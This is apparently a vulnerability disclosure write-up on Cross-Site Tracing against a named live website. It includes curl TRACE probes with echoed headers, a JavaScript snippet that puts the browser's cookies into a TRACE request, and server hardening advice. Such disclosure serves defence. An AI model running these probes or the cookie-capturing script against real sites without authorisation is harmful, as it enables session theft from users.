XST (Cross-Site Tracing)

Description

Vulnerability Description: Cross-Site Tracing (XST)

The Cross-Site Tracing (XST) vulnerability arises when the HTTP TRACE method is enabled on a web server. TRACE is a debugging method that echoes back any request sent to the server, including request headers. If exploited, XST could expose sensitive information such as session cookies, authentication tokens, or other headers, potentially enabling further attacks like Cross-Site Scripting (XSS).

Impact:
Potential Data Exposure: XST can reveal sensitive headers (e.g., cookies, tokens) if combined with other weaknesses, such as lack of the HttpOnly flag on cookies. Exploitation Vector: An attacker could use JavaScript in a browser to make a TRACE request to the vulnerable server, capturing sensitive information from the response. Chained Attacks: If other security measures are weak, XST can facilitate session hijacking, credential theft, or impersonation.

Step 1: Verify TRACE Method Support Run the following command to check if the TRACE method is enabled:

Request:

curl -s -X TRACE https://www.westernunion.gr

Response:

TRACE / HTTP/1.1
Host: www.westernunion.gr
User-Agent: curl/8.11.1
Accept: */*
X-Forwarded-For: 24.202.251.187
X-Real-IP: 24.202.251.187
X-Forwarded-Proto: https

Step 2: Demonstrate Header Echo Add a custom header to demonstrate how the server echoes arbitrary data:

Request:

curl -s -X TRACE https://www.westernunion.gr -H "Authorization: Bearer test12345"

Response:

TRACE / HTTP/1.1
Host: www.westernunion.gr
User-Agent: curl/8.11.1
Accept: */*
Authorization: Bearer test12345
X-Forwarded-For: 24.202.251.187
X-Real-IP: 24.202.251.187
X-Forwarded-Proto: https

This shows that the server echoes custom headers, proving that any information in the headers could be captured by an attacker.

Step 3: Exploiting with XST and JavaScript An attacker could use a malicious script to exploit this vulnerability. Here's an example of how this could be done: 

var xhr = new XMLHttpRequest();
xhr.open("TRACE", "https://www.westernunion.gr", true);
xhr.setRequestHeader("Cookie", document.cookie);
xhr.onreadystatechange = function() {
if (xhr.readyState == 4 && xhr.status == 200) {
console.log(xhr.responseText); // Captures and logs the echoed headers
}
};
xhr.send();

If this script is injected into a vulnerable webpage, it could execute in a victim's browser, sending the TRACE request to the server and potentially leaking sensitive information like cookies.

Recommendations:
Disable TRACE Method: Restrict the TRACE method in the web server's configuration to prevent abuse.
For Apache: 

TraceEnable Off

For Nginx: Add a rule to block TRACE requests. For IIS: Disable TRACE via the web.config file or security settings.

Set Secure Cookie Attributes: Use HttpOnly and Secure flags on cookies